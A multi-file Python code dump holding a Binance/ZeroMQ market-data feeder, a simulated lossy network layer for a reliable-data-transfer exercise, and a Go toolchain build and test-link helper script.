import queue, threading, multiprocessing
import binascii
import gzip
import pprint
from .exchange import BinanceDriver
from .endpoint import SocketEndppoint, PushPub
class Feeder(threading.Thread):
output = queue.Queue()
def __init__(self, config, subscribe):
threading.Thread.__init__(self)
self.config = config
self.subheaders = subscribe
self.childs = []
for i in config['exchanges']:
driver_config = {"exchange": i['name'],
"pairs":i['pairs'],
"mode": i["mode"],
"output": multiprocessing.Queue()
}
public_drv = BinanceDriver( conf=driver_config, addr=config['addr'], port=config['port'][0] )
public_drv.start()
self.childs.append(public_drv)
pull_pub = PushPub("drivers_pull_pub",
pull_address= f"{config['addr']}:{config['port'][0]}",
pub_address= f"0.0.0.0:{config['port'][1]}")
pull_pub.start()
self.childs.append(pull_pub)
self.endpoint = SocketEndppoint(sources=[ f"0.0.0.0:{config['port'][1]}" ],
endpoint=f"0.0.0.0:{config['port'][2]}")
self.endpoint.start()
self.childs.append(self.endpoint)
def socket_listener(self):
context = zmq.Context()
subscriber = context.socket(zmq.SUB)
subscriber.connect(f"tcp://{self.config['addr']}:{self.config['port'][2]}")
for i in self.subheaders:
subscriber.setsockopt(zmq.SUBSCRIBE, f"{i}@".encode())
try:
while True:
try:
rcv = subscriber.recv()
except zmq.Again as e:
print(e)
else:
# topic, payload = rcv.split(b'@',1)
# payload = gzip.decompress(payload)
# payload = json.loads(payload)
self.output.put(rcv)
except KeyboardInterrupt as e:
pass
def queue_listener(self, q):
try:
while True:
try:
rcv = q.get()
self.output.put(rcv)
except Exception as e:
print(e)
except KeyboardInterrupt as e:
pass
def run(self):
thread_id = []
th = threading.Thread(target=self.socket_listener)
th.start()
thread_id.append(th)
try:
for i in thread_id:
i.join()
for i in self.childs:
i.join()
except KeyboardInterrupt as e:
pass
|
Network.py
|
import argparse
import socket
import threading
from time import sleep
import random
import RDT
## Provides an abstraction for the network layer
class NetworkLayer:
#configuration parameters
prob_pkt_loss = 0
prob_byte_corr = .3
prob_pkt_reorder = 0
#class variables
sock = None
conn = None
buffer_S = ''
lock = threading.Lock()
collect_thread = None
stop = None
socket_timeout = 0.01
reorder_msg_S = None
def __init__(self, role_S, server_S, port):
if role_S == 'client':
print('Network: role is client')
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.connect((server_S, port))
self.conn.settimeout(self.socket_timeout)
elif role_S == 'server':
print('Network: role is server')
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind(('localhost', port))
self.sock.listen(1)
self.conn, addr = self.sock.accept()
self.conn.settimeout(self.socket_timeout)
#start the thread to receive data on the connection
self.collect_thread = threading.Thread(name='Collector', target=self.collect)
self.stop = False
self.collect_thread.start()
def disconnect(self):
if self.collect_thread:
self.stop = True
self.collect_thread.join()
def __del__(self):
if self.sock is not None: self.sock.close()
if self.conn is not None: self.conn.close()
def udt_send(self, msg_S):
#return without sending if the packet is being dropped
if random.random() < self.prob_pkt_loss:
return
#corrupt a packet
if random.random() < self.prob_byte_corr:
start = random.randint(RDT.Packet.length_S_length,len(msg_S)-5) #make sure we are not corrupting the length field,
#since that makes life really difficult
num = random.randint(1,5)
repl_S = ''.join(random.sample('XXXXX', num)) #sample length >= num
msg_S = msg_S[:start]+repl_S+msg_S[start+num:]
#reorder packets - either hold a packet back, or if one held back then send both
if random.random() < self.prob_pkt_reorder or self.reorder_msg_S:
if self.reorder_msg_S is None:
self.reorder_msg_S = msg_S
return None
else:
msg_S += self.reorder_msg_S
self.reorder_msg_S = None
#keep calling send until all the bytes are transferred
totalsent = 0
while totalsent < len(msg_S):
sent = self.conn.send(msg_S[totalsent:].encode('utf-8'))
if sent == 0:
raise RuntimeError("socket connection broken")
totalsent = totalsent + sent
## Receive data from the network and save in internal buffer
def collect(self):
# print (threading.currentThread().getName() + ': Starting')
while(True):
try:
recv_bytes = self.conn.recv(2048)
with self.lock:
self.buffer_S += recv_bytes.decode('utf-8')
# you may need to uncomment the BlockingIOError handling on Windows machines
# except BlockingIOError as err:
# pass
except socket.timeout as err:
pass
if self.stop:
# print (threading.currentThread().getName() + ': Ending')
return
## Deliver collected data to client
def udt_receive(self):
with self.lock:
ret_S = self.buffer_S
self.buffer_S = ''
return ret_S
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Network layer implementation.')
parser.add_argument('role', help='Role is either client or server.', choices=['client', 'server'])
parser.add_argument('server', help='Server.')
parser.add_argument('port', help='Port.', type=int)
args = parser.parse_args()
network = NetworkLayer(args.role, args.server, args.port)
if args.role == 'client':
network.udt_send('MSG_FROM_CLIENT')
sleep(2)
print(network.udt_receive())
network.disconnect()
else:
sleep(1)
print(network.udt_receive())
network.udt_send('MSG_FROM_SERVER')
network.disconnect()
|
go_tool.py
|
from __future__ import absolute_import, unicode_literals
import argparse
import codecs
import copy
import json
import os
import re
import shutil
import subprocess
import sys
import tarfile
import tempfile
import threading
import six
from functools import reduce
import process_command_files as pcf
import process_whole_archive_option as pwa
arc_project_prefix = 'a.yandex-team.ru/'
std_lib_prefix = 'contrib/go/_std/src/'
vendor_prefix = 'vendor/'
vet_info_ext = '.vet.out'
vet_report_ext = '.vet.txt'
FIXED_CGO1_SUFFIX='.fixed.cgo1.go'
COMPILE_OPTIMIZATION_FLAGS=('-N',)
def get_trimpath_args(args):
return ['-trimpath', args.trimpath] if args.trimpath else []
def preprocess_cgo1(src_path, dst_path, source_root):
with open(src_path, 'r') as f:
content = f.read()
content = content.replace('__ARCADIA_SOURCE_ROOT_PREFIX__', source_root)
with open(dst_path, 'w') as f:
f.write(content)
def preprocess_args(args):
# Temporary work around for noauto
if args.cgo_srcs and len(args.cgo_srcs) > 0:
cgo_srcs_set = set(args.cgo_srcs)
args.srcs = [x for x in args.srcs if x not in cgo_srcs_set]
args.pkg_root = os.path.join(args.toolchain_root, 'pkg')
toolchain_tool_root = os.path.join(args.pkg_root, 'tool', '{}_{}'.format(args.host_os, args.host_arch))
args.go_compile = os.path.join(toolchain_tool_root, 'compile')
args.go_cgo = os.path.join(toolchain_tool_root, 'cgo')
args.go_link = os.path.join(toolchain_tool_root, 'link')
args.go_asm = os.path.join(toolchain_tool_root, 'asm')
args.go_pack = os.path.join(toolchain_tool_root, 'pack')
args.go_vet = os.path.join(toolchain_tool_root, 'vet') if args.vet is True else args.vet
args.output = os.path.normpath(args.output)
args.vet_report_output = vet_report_output_name(args.output, args.vet_report_ext)
args.trimpath = None
if args.debug_root_map:
roots = {'build': args.build_root, 'source': args.source_root, 'tools': args.tools_root}
replaces = []
for root in args.debug_root_map.split(';'):
src, dst = root.split('=', 1)
assert src in roots
replaces.append('{}=>{}'.format(roots[src], dst))
del roots[src]
assert len(replaces) > 0
args.trimpath = ';'.join(replaces)
args.build_root = os.path.normpath(args.build_root)
args.build_root_dir = args.build_root + os.path.sep
args.source_root = os.path.normpath(args.source_root)
args.source_root_dir = args.source_root + os.path.sep
args.output_root = os.path.normpath(args.output_root)
args.import_map = {}
args.module_map = {}
if args.cgo_peers:
args.cgo_peers = [x for x in args.cgo_peers if not x.endswith('.fake.pkg')]
srcs = []
for f in args.srcs:
if f.endswith('.gosrc'):
with tarfile.open(f, 'r') as tar:
srcs.extend(os.path.join(args.output_root, src) for src in tar.getnames())
tar.extractall(path=args.output_root)
else:
srcs.append(f)
args.srcs = srcs
assert args.mode == 'test' or args.test_srcs is None and args.xtest_srcs is None
# add lexical oreder by basename for go sources
args.srcs.sort(key=lambda x: os.path.basename(x))
if args.test_srcs:
args.srcs += sorted(args.test_srcs, key=lambda x: os.path.basename(x))
del args.test_srcs
if args.xtest_srcs:
args.xtest_srcs.sort(key=lambda x: os.path.basename(x))
# compute root relative module dir path
assert args.output is None or args.output_root == os.path.dirname(args.output)
assert args.output_root.startswith(args.build_root_dir)
args.module_path = args.output_root[len(args.build_root_dir):]
args.source_module_dir = os.path.join(args.source_root, args.test_import_path or args.module_path) + os.path.sep
assert len(args.module_path) > 0
args.import_path, args.is_std = get_import_path(args.module_path)
assert args.asmhdr is None or args.word == 'go'
srcs = []
for f in args.srcs:
if f.endswith(FIXED_CGO1_SUFFIX) and f.startswith(args.build_root_dir):
path = os.path.join(args.output_root, '{}.cgo1.go'.format(os.path.basename(f[:-len(FIXED_CGO1_SUFFIX)])))
srcs.append(path)
preprocess_cgo1(f, path, args.source_root)
else:
srcs.append(f)
args.srcs = srcs
if args.extldflags:
args.extldflags = pwa.ProcessWholeArchiveOption(args.targ_os).construct_cmd(args.extldflags)
classify_srcs(args.srcs, args)
def compare_versions(version1, version2):
def last_index(version):
index = version.find('beta')
return len(version) if index < 0 else index
v1 = tuple(x.zfill(8) for x in version1[:last_index(version1)].split('.'))
v2 = tuple(x.zfill(8) for x in version2[:last_index(version2)].split('.'))
if v1 == v2:
return 0
return 1 if v1 < v2 else -1
def get_symlink_or_copyfile():
os_symlink = getattr(os, 'symlink', None)
if os_symlink is None:
os_symlink = shutil.copyfile
return os_symlink
def copy_args(args):
return copy.copy(args)
def get_vendor_index(import_path):
index = import_path.rfind('/' + vendor_prefix)
if index < 0:
index = 0 if import_path.startswith(vendor_prefix) else index
else:
index = index + 1
return index
def get_import_path(module_path):
assert len(module_path) > 0
import_path = module_path.replace('\\', '/')
is_std_module = import_path.startswith(std_lib_prefix)
if is_std_module:
import_path = import_path[len(std_lib_prefix):]
elif import_path.startswith(vendor_prefix):
import_path = import_path[len(vendor_prefix):]
else:
import_path = arc_project_prefix + import_path
assert len(import_path) > 0
return import_path, is_std_module
def call(cmd, cwd, env=None):
# sys.stderr.write('{}\n'.format(' '.join(cmd)))
return subprocess.check_output(cmd, stdin=None, stderr=subprocess.STDOUT, cwd=cwd, env=env)
def classify_srcs(srcs, args):
args.go_srcs = [x for x in srcs if x.endswith('.go')]
args.asm_srcs = [x for x in srcs if x.endswith('.s')]
args.objects = [x for x in srcs if x.endswith('.o') or x.endswith('.obj')]
args.symabis = [x for x in srcs if x.endswith('.symabis')]
args.sysos = [x for x in srcs if x.endswith('.syso')]
def get_import_config_info(peers, gen_importmap, import_map={}, module_map={}):
info = {'importmap': [], 'packagefile': [], 'standard': {}}
if gen_importmap:
for key, value in six.iteritems(import_map):
info['importmap'].append((key, value))
for peer in peers:
peer_import_path, is_std = get_import_path(os.path.dirname(peer))
if gen_importmap:
index = get_vendor_index(peer_import_path)
if index >= 0:
index += len(vendor_prefix)
info['importmap'].append((peer_import_path[index:], peer_import_path))
info['packagefile'].append((peer_import_path, os.path.join(args.build_root, peer)))
if is_std:
info['standard'][peer_import_path] = True
for key, value in six.iteritems(module_map):
info['packagefile'].append((key, value))
return info
def create_import_config(peers, gen_importmap, import_map={}, module_map={}):
lines = []
info = get_import_config_info(peers, gen_importmap, import_map, module_map)
for key in ('importmap', 'packagefile'):
for item in info[key]:
lines.append('{} {}={}'.format(key, *item))
if len(lines) > 0:
lines.append('')
content = '\n'.join(lines)
# sys.stderr.writelines('{}\n'.format(l) for l in lines)
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(content.encode('UTF-8'))
return f.name
return None
def create_embed_config(args):
data = {
'Patterns': {},
'Files': {},
}
for info in args.embed:
pattern = info[0]
if pattern.endswith('/**/*'):
pattern = pattern[:-3]
files = {os.path.relpath(f, args.source_module_dir).replace('\\', '/'): f for f in info[1:]}
data['Patterns'][pattern] = list(files.keys())
data['Files'].update(files)
# sys.stderr.write('{}\n'.format(json.dumps(data, indent=4)))
with tempfile.NamedTemporaryFile(delete=False, suffix='.embedcfg') as f:
f.write(json.dumps(data).encode('UTF-8'))
return f.name
def vet_info_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_info_ext)
def vet_report_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_report_ext)
def get_source_path(args):
return args.test_import_path or args.module_path
def gen_vet_info(args):
import_path = args.real_import_path if hasattr(args, 'real_import_path') else args.import_path
info = get_import_config_info(args.peers, True, args.import_map, args.module_map)
import_map = dict(info['importmap'])
# FIXME(snermolaev): it seems that adding import map for 'fake' package
# does't make any harm (it needs to be revised later)
import_map['unsafe'] = 'unsafe'
for (key, _) in info['packagefile']:
if key not in import_map:
import_map[key] = key
data = {
'ID': import_path,
'Compiler': 'gc',
'Dir': os.path.join(args.source_root, get_source_path(args)),
'ImportPath': import_path,
'GoFiles': [x for x in args.go_srcs if x.endswith('.go')],
'NonGoFiles': [x for x in args.go_srcs if not x.endswith('.go')],
'ImportMap': import_map,
'PackageFile': dict(info['packagefile']),
'Standard': dict(info['standard']),
'PackageVetx': dict((key, vet_info_output_name(value)) for key, value in info['packagefile']),
'VetxOnly': False,
'VetxOutput': vet_info_output_name(args.output),
'SucceedOnTypecheckFailure': False
}
# sys.stderr.write('{}\n'.format(json.dumps(data, indent=4)))
return data
def create_vet_config(args, info):
with tempfile.NamedTemporaryFile(delete=False, suffix='.cfg') as f:
f.write(json.dumps(info).encode('UTF-8'))
return f.name
def decode_vet_report(json_report):
report = ''
if json_report:
try:
full_diags = json.JSONDecoder().decode(json_report.decode('UTF-8'))
except ValueError:
report = json_report
else:
messages = []
for _, module_diags in six.iteritems(full_diags):
for _, type_diags in six.iteritems(module_diags):
for diag in type_diags:
messages.append('{}: {}'.format(diag['posn'], json.dumps(diag['message'])))
report = '\n'.join(messages)
return report
def dump_vet_report(args, report):
if report:
report = report.replace(args.build_root, '$B')
report = report.replace(args.source_root, '$S')
with open(args.vet_report_output, 'w') as f:
f.write(report)
def read_vet_report(args):
assert args
report = ''
if os.path.exists(args.vet_report_output):
with open(args.vet_report_output, 'r') as f:
report += f.read()
return report
def dump_vet_report_for_tests(args, *test_args_list):
dump_vet_report(args, reduce(lambda x, y: x + read_vet_report(y), [_f for _f in test_args_list if _f], ''))
def do_vet(args):
assert args.vet
info = gen_vet_info(args)
vet_config = create_vet_config(args, info)
cmd = [args.go_vet, '-json']
if args.vet_flags:
cmd.extend(args.vet_flags)
cmd.append(vet_config)
# sys.stderr.write('>>>> [{}]\n'.format(' '.join(cmd)))
p_vet = subprocess.Popen(cmd, stdin=None, stderr=subprocess.PIPE, stdout=subprocess.PIPE, cwd=args.source_root)
vet_out, vet_err = p_vet.communicate()
report = decode_vet_report(vet_out) if vet_out else ''
dump_vet_report(args, report)
if p_vet.returncode:
raise subprocess.CalledProcessError(returncode=p_vet.returncode, cmd=cmd, output=vet_err)
def _do_compile_go(args):
import_path, is_std_module = args.import_path, args.is_std
cmd = [
args.go_compile,
'-o',
args.output,
'-p',
import_path,
'-D',
'""',
'-goversion',
'go{}'.format(args.goversion)
]
cmd.extend(get_trimpath_args(args))
compiling_runtime = False
if is_std_module:
cmd.append('-std')
if import_path in ('runtime', 'internal/abi', 'internal/bytealg', 'internal/cpu') or import_path.startswith('runtime/internal/'):
cmd.append('-+')
compiling_runtime = True
import_config_name = create_import_config(args.peers, True, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
else:
if import_path == 'unsafe' or len(args.objects) > 0 or args.asmhdr:
pass
else:
cmd.append('-complete')
# if compare_versions('1.16', args.goversion) >= 0:
if args.embed:
embed_config_name = create_embed_config(args)
cmd.extend(['-embedcfg', embed_config_name])
if args.asmhdr:
cmd += ['-asmhdr', args.asmhdr]
# Use .symabis (starting from 1.12 version)
if args.symabis:
cmd += ['-symabis'] + args.symabis
# If 1.12 <= version < 1.13 we have to pass -allabis for 'runtime' and 'runtime/internal/atomic'
# if compare_versions('1.13', args.goversion) >= 0:
# pass
# elif import_path in ('runtime', 'runtime/internal/atomic'):
# cmd.append('-allabis')
compile_workers = '4'
if args.compile_flags:
if compiling_runtime:
cmd.extend(x for x in args.compile_flags if x not in COMPILE_OPTIMIZATION_FLAGS)
else:
cmd.extend(args.compile_flags)
if any([x in ('-race', '-shared') for x in args.compile_flags]):
compile_workers = '1'
cmd += ['-pack', '-c={}'.format(compile_workers)]
cmd += args.go_srcs
call(cmd, args.build_root)
class VetThread(threading.Thread):
def __init__(self, target, args):
super(VetThread, self).__init__(target=target, args=args)
self.exc_info = None
def run(self):
try:
super(VetThread, self).run()
except:
self.exc_info = sys.exc_info()
def join_with_exception(self, reraise_exception):
self.join()
if reraise_exception and self.exc_info:
six.reraise(self.exc_info[0], self.exc_info[1], self.exc_info[2])
def do_compile_go(args):
raise_exception_from_vet = False
if args.vet:
run_vet = VetThread(target=do_vet, args=(args,))
run_vet.start()
try:
_do_compile_go(args)
raise_exception_from_vet = True
finally:
if args.vet:
run_vet.join_with_exception(raise_exception_from_vet)
def do_compile_asm(args):
def need_compiling_runtime(import_path):
return import_path in ('runtime', 'reflect', 'syscall') or \
import_path.startswith('runtime/internal/') or \
compare_versions('1.17', args.goversion) >= 0 and import_path == 'internal/bytealg'
assert(len(args.srcs) == 1 and len(args.asm_srcs) == 1)
cmd = [args.go_asm]
cmd += get_trimpath_args(args)
cmd += ['-I', args.output_root, '-I', os.path.join(args.pkg_root, 'include')]
cmd += ['-D', 'GOOS_' + args.targ_os, '-D', 'GOARCH_' + args.targ_arch, '-o', args.output]
# if compare_versions('1.16', args.goversion) >= 0:
cmd += ['-p', args.import_path]
if need_compiling_runtime(args.import_path):
cmd += ['-compiling-runtime']
if args.asm_flags:
cmd += args.asm_flags
cmd += args.asm_srcs
call(cmd, args.build_root)
def do_link_lib(args):
if len(args.asm_srcs) > 0:
asmargs = copy_args(args)
asmargs.asmhdr = os.path.join(asmargs.output_root, 'go_asm.h')
do_compile_go(asmargs)
for src in asmargs.asm_srcs:
asmargs.srcs = [src]
asmargs.asm_srcs = [src]
asmargs.output = os.path.join(asmargs.output_root, os.path.basename(src) + '.o')
do_compile_asm(asmargs)
args.objects.append(asmargs.output)
else:
do_compile_go(args)
if args.objects or args.sysos:
cmd = [args.go_pack, 'r', args.output] + args.objects + args.sysos
call(cmd, args.build_root)
def do_link_exe(args):
assert args.extld is not None
assert args.non_local_peers is not None
compile_args = copy_args(args)
compile_args.output = os.path.join(args.output_root, 'main.a')
compile_args.real_import_path = compile_args.import_path
compile_args.import_path = 'main'
if args.vcs and os.path.isfile(compile_args.vcs):
build_info = os.path.join('library', 'go', 'core', 'buildinfo')
if any([x.startswith(build_info) for x in compile_args.peers]):
compile_args.go_srcs.append(compile_args.vcs)
do_link_lib(compile_args)
cmd = [args.go_link, '-o', args.output]
import_config_name = create_import_config(args.peers + args.non_local_peers, False, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
if args.link_flags:
cmd += args.link_flags
if args.mode in ('exe', 'test'):
cmd.append('-buildmode=exe')
elif args.mode == 'dll':
cmd.append('-buildmode=c-shared')
else:
assert False, 'Unexpected mode: {}'.format(args.mode)
cmd.append('-extld={}'.format(args.extld))
extldflags = []
if args.extldflags is not None:
filter_musl = bool
if args.musl:
cmd.append('-linkmode=external')
extldflags.append('-static')
filter_musl = lambda x: x not in ('-lc', '-ldl', '-lm', '-lpthread', '-lrt')
extldflags += [x for x in args.extldflags if filter_musl(x)]
cgo_peers = []
if args.cgo_peers is not None and len(args.cgo_peers) > 0:
is_group = args.targ_os == 'linux'
if is_group:
cgo_peers.append('-Wl,--start-group')
cgo_peers.extend(args.cgo_peers)
if is_group:
cgo_peers.append('-Wl,--end-group')
try:
index = extldflags.index('--cgo-peers')
extldflags = extldflags[:index] + cgo_peers + extldflags[index+1:]
except ValueError:
extldflags.extend(cgo_peers)
if len(extldflags) > 0:
cmd.append('-extldflags={}'.format(' '.join(extldflags)))
cmd.append(compile_args.output)
call(cmd, args.build_root)
def gen_cover_info(args):
lines = []
lines.extend([
"""
var (
coverCounters = make(map[string][]uint32)
coverBlocks = make(map[string][]testing.CoverBlock)
)
""",
'func init() {',
])
for var, file in (x.split(':') for x in args.cover_info):
lines.append(' coverRegisterFile("{file}", _cover0.{var}.Count[:], _cover0.{var}.Pos[:], _cover0.{var}.NumStmt[:])'.format(file=file, var=var))
lines.extend([
'}',
"""
func coverRegisterFile(fileName string, counter []uint32, pos []uint32, numStmts []uint16) {
if 3*len(counter) != len(pos) || len(counter) != len(numStmts) {
panic("coverage: mismatched sizes")
}
if coverCounters[fileName] != nil {
// Already registered.
return
}
coverCounters[fileName] = counter
block := make([]testing.CoverBlock, len(counter))
for i := range counter {
block[i] = testing.CoverBlock{
Line0: pos[3*i+0],
Col0: uint16(pos[3*i+2]),
Line1: pos[3*i+1],
Col1: uint16(pos[3*i+2]>>16),
Stmts: numStmts[i],
}
}
coverBlocks[fileName] = block
}
""",
])
return lines
def filter_out_skip_tests(tests, skip_tests):
skip_set = set()
star_skip_set = set()
for t in skip_tests:
work_set = star_skip_set if '*' in t else skip_set
work_set.add(t)
re_star_tests = None
if len(star_skip_set) > 0:
re_star_tests = re.compile(re.sub(r'(\*)+', r'.\1', '^({})$'.format('|'.join(star_skip_set))))
return [x for x in tests if not (x in skip_tests or re_star_tests and re_star_tests.match(x))]
def gen_test_main(args, test_lib_args, xtest_lib_args):
assert args and (test_lib_args or xtest_lib_args)
test_miner = args.test_miner
test_module_path = test_lib_args.import_path if test_lib_args else xtest_lib_args.import_path
is_cover = args.cover_info and len(args.cover_info) > 0
# Prepare GOPATH
# $BINDIR
# |- __go__
# |- src
# |- pkg
# |- ${TARGET_OS}_${TARGET_ARCH}
go_path_root = os.path.join(args.output_root, '__go__')
test_src_dir = os.path.join(go_path_root, 'src')
target_os_arch = '_'.join([args.targ_os, args.targ_arch])
test_pkg_dir = os.path.join(go_path_root, 'pkg', target_os_arch, os.path.dirname(test_module_path))
os.makedirs(test_pkg_dir)
my_env = os.environ.copy()
my_env['GOROOT'] = ''
my_env['GOPATH'] = go_path_root
my_env['GOARCH'] = args.targ_arch
my_env['GOOS'] = args.targ_os
tests = []
xtests = []
os_symlink = get_symlink_or_copyfile()
# Get the list of "internal" tests
if test_lib_args:
os.makedirs(os.path.join(test_src_dir, test_module_path))
os_symlink(test_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(test_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', test_module_path]
tests = [x for x in (call(cmd, test_lib_args.output_root, my_env).decode('UTF-8') or '').strip().split('\n') if len(x) > 0]
if args.skip_tests:
tests = filter_out_skip_tests(tests, args.skip_tests)
test_main_found = '#TestMain' in tests
# Get the list of "external" tests
if xtest_lib_args:
xtest_module_path = xtest_lib_args.import_path
os.makedirs(os.path.join(test_src_dir, xtest_module_path))
os_symlink(xtest_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(xtest_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', xtest_module_path]
xtests = [x for x in (call(cmd, xtest_lib_args.output_root, my_env).decode('UTF-8') or '').strip().split('\n') if len(x) > 0]
if args.skip_tests:
xtests = filter_out_skip_tests(xtests, args.skip_tests)
xtest_main_found = '#TestMain' in xtests
test_main_package = None
if test_main_found and xtest_main_found:
assert False, 'multiple definition of TestMain'
elif test_main_found:
test_main_package = '_test'
elif xtest_main_found:
test_main_package = '_xtest'
shutil.rmtree(go_path_root)
lines = ['package main', '', 'import (']
if test_main_package is None:
lines.append(' "os"')
lines.extend([' "testing"', ' "testing/internal/testdeps"'])
if len(tests) > 0:
lines.append(' _test "{}"'.format(test_module_path))
elif test_lib_args:
lines.append(' _ "{}"'.format(test_module_path))
if len(xtests) > 0:
lines.append(' _xtest "{}"'.format(xtest_module_path))
elif xtest_lib_args:
lines.append(' _ "{}"'.format(xtest_module_path))
if is_cover:
lines.append(' _cover0 "{}"'.format(test_module_path))
lines.extend([')', ''])
if compare_versions('1.18', args.goversion) < 0:
kinds = ['Test', 'Benchmark', 'Example']
else:
kinds = ['Test', 'Benchmark', 'FuzzTarget', 'Example']
var_names = []
for kind in kinds:
var_name = '{}s'.format(kind.lower())
var_names.append(var_name)
lines.append('var {} = []testing.Internal{}{{'.format(var_name, kind))
for test in [x for x in tests if x.startswith(kind)]:
lines.append(' {{"{test}", _test.{test}}},'.format(test=test))
for test in [x for x in xtests if x.startswith(kind)]:
lines.append(' {{"{test}", _xtest.{test}}},'.format(test=test))
lines.extend(['}', ''])
if is_cover:
lines.extend(gen_cover_info(args))
lines.append('func main() {')
if is_cover:
lines.extend([
' testing.RegisterCover(testing.Cover{',
' Mode: "set",',
' Counters: coverCounters,',
' Blocks: coverBlocks,',
' CoveredPackages: "",',
' })',
])
lines.extend([
' m := testing.MainStart(testdeps.TestDeps{{}}, {})'.format(', '.join(var_names)),
'',
])
if test_main_package:
lines.append(' {}.TestMain(m)'.format(test_main_package))
else:
lines.append(' os.Exit(m.Run())')
lines.extend(['}', ''])
content = '\n'.join(lines)
# sys.stderr.write('{}\n'.format(content))
return content
def do_link_test(args):
assert args.srcs or args.xtest_srcs
assert args.test_miner is not None
test_module_path = get_source_path(args)
test_import_path, _ = get_import_path(test_module_path)
test_lib_args = copy_args(args) if args.srcs else None
xtest_lib_args = copy_args(args) if args.xtest_srcs else None
if xtest_lib_args is not None:
xtest_lib_args.embed = args.embed_xtest if args.embed_xtest else None
ydx_file_name = None
xtest_ydx_file_name = None
need_append_ydx = test_lib_args and xtest_lib_args and args.ydx_file and args.vet_flags
if need_append_ydx:
def find_ydx_file_name(name, flags):
for i, elem in enumerate(flags):
if elem.endswith(name):
return (i, elem)
assert False, 'Unreachable code'
idx, ydx_file_name = find_ydx_file_name(xtest_lib_args.ydx_file, xtest_lib_args.vet_flags)
xtest_ydx_file_name = '{}_xtest'.format(ydx_file_name)
xtest_lib_args.vet_flags = copy.copy(xtest_lib_args.vet_flags)
xtest_lib_args.vet_flags[idx] = xtest_ydx_file_name
if test_lib_args:
test_lib_args.output = os.path.join(args.output_root, 'test.a')
test_lib_args.vet_report_output = vet_report_output_name(test_lib_args.output)
test_lib_args.module_path = test_module_path
test_lib_args.import_path = test_import_path
do_link_lib(test_lib_args)
if xtest_lib_args:
xtest_lib_args.srcs = xtest_lib_args.xtest_srcs
classify_srcs(xtest_lib_args.srcs, xtest_lib_args)
xtest_lib_args.output = os.path.join(args.output_root, 'xtest.a')
xtest_lib_args.vet_report_output = vet_report_output_name(xtest_lib_args.output)
xtest_lib_args.module_path = test_module_path + '_test'
xtest_lib_args.import_path = test_import_path + '_test'
if test_lib_args:
xtest_lib_args.module_map[test_import_path] = test_lib_args.output
need_append_ydx = args.ydx_file and args.srcs and args.vet_flags
do_link_lib(xtest_lib_args)
if need_append_ydx:
with open(os.path.join(args.build_root, ydx_file_name), 'ab') as dst_file:
with open(os.path.join(args.build_root, xtest_ydx_file_name), 'rb') as src_file:
dst_file.write(src_file.read())
test_main_content = gen_test_main(args, test_lib_args, xtest_lib_args)
test_main_name = os.path.join(args.output_root, '_test_main.go')
with open(test_main_name, "w") as f:
f.write(test_main_content)
test_args = copy_args(args)
test_args.embed = None
test_args.srcs = [test_main_name]
if test_args.test_import_path is None:
# it seems that we can do it unconditionally, but this kind
# of mangling doesn't really looks good to me and we leave it
# for pure GO_TEST module
test_args.module_path = test_args.module_path + '___test_main__'
test_args.import_path = test_args.import_path + '___test_main__'
classify_srcs(test_args.srcs, test_args)
if test_lib_args:
test_args.module_map[test_lib_args.import_path] = test_lib_args.output
if xtest_lib_args:
test_args.module_map[xtest_lib_args.import_path] = xtest_lib_args.output
if args.vet:
dump_vet_report_for_tests(test_args, test_lib_args, xtest_lib_args)
test_args.vet = False
do_link_exe(test_args)
if __name__ == '__main__':
reload(sys)
sys.setdefaultencoding('utf-8')
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
sys.stderr = codecs.getwriter('utf8')(sys.stderr)
args = pcf.get_args(sys.argv[1:])
parser = argparse.ArgumentParser(prefix_chars='+')
parser.add_argument('++mode', choices=['dll', 'exe', 'lib', 'test'], required=True)
parser.add_argument('++srcs', nargs='*', required=True)
parser.add_argument('++cgo-srcs', nargs='*')
parser.add_argument('++test_srcs', nargs='*')
parser.add_argument('++xtest_srcs', nargs='*')
parser.add_argument('++cover_info', nargs='*')
parser.add_argument('++output', nargs='?', default=None)
parser.add_argument('++source-root', default=None)
parser.add_argument('++build-root', required=True)
parser.add_argument('++tools-root', default=None)
parser.add_argument('++output-root', required=True)
parser.add_argument('++toolchain-root', required=True)
parser.add_argument('++host-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++host-arch', choices=['amd64', 'arm64'], required=True)
parser.add_argument('++targ-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++targ-arch', choices=['amd64', 'x86', 'arm64'], required=True)
parser.add_argument('++peers', nargs='*')
parser.add_argument('++non-local-peers', nargs='*')
parser.add_argument('++cgo-peers', nargs='*')
parser.add_argument('++asmhdr', nargs='?', default=None)
parser.add_argument('++test-import-path', nargs='?')
parser.add_argument('++test-miner', nargs='?')
parser.add_argument('++arc-project-prefix', nargs='?', default=arc_project_prefix)
parser.add_argument('++std-lib-prefix', nargs='?', default=std_lib_prefix)
parser.add_argument('++vendor-prefix', nargs='?', default=vendor_prefix)
parser.add_argument('++extld', nargs='?', default=None)
parser.add_argument('++extldflags', nargs='+', default=None)
parser.add_argument('++goversion', required=True)
parser.add_argument('++asm-flags', nargs='*')
parser.add_argument('++compile-flags', nargs='*')
parser.add_argument('++link-flags', nargs='*')
parser.add_argument('++vcs', nargs='?', default=None)
parser.add_argument('++vet', nargs='?', const=True, default=False)
parser.add_argument('++vet-flags', nargs='*', default=None)
parser.add_argument('++vet-info-ext', default=vet_info_ext)
parser.add_argument('++vet-report-ext', default=vet_report_ext)
parser.add_argument('++musl', action='store_true')
parser.add_argument('++skip-tests', nargs='*', default=None)
parser.add_argument('++ydx-file', default='')
parser.add_argument('++debug-root-map', default=None)
parser.add_argument('++embed', action='append', nargs='*')
parser.add_argument('++embed_xtest', action='append', nargs='*')
args = parser.parse_args(args)
arc_project_prefix = args.arc_project_prefix
std_lib_prefix = args.std_lib_prefix
vendor_prefix = args.vendor_prefix
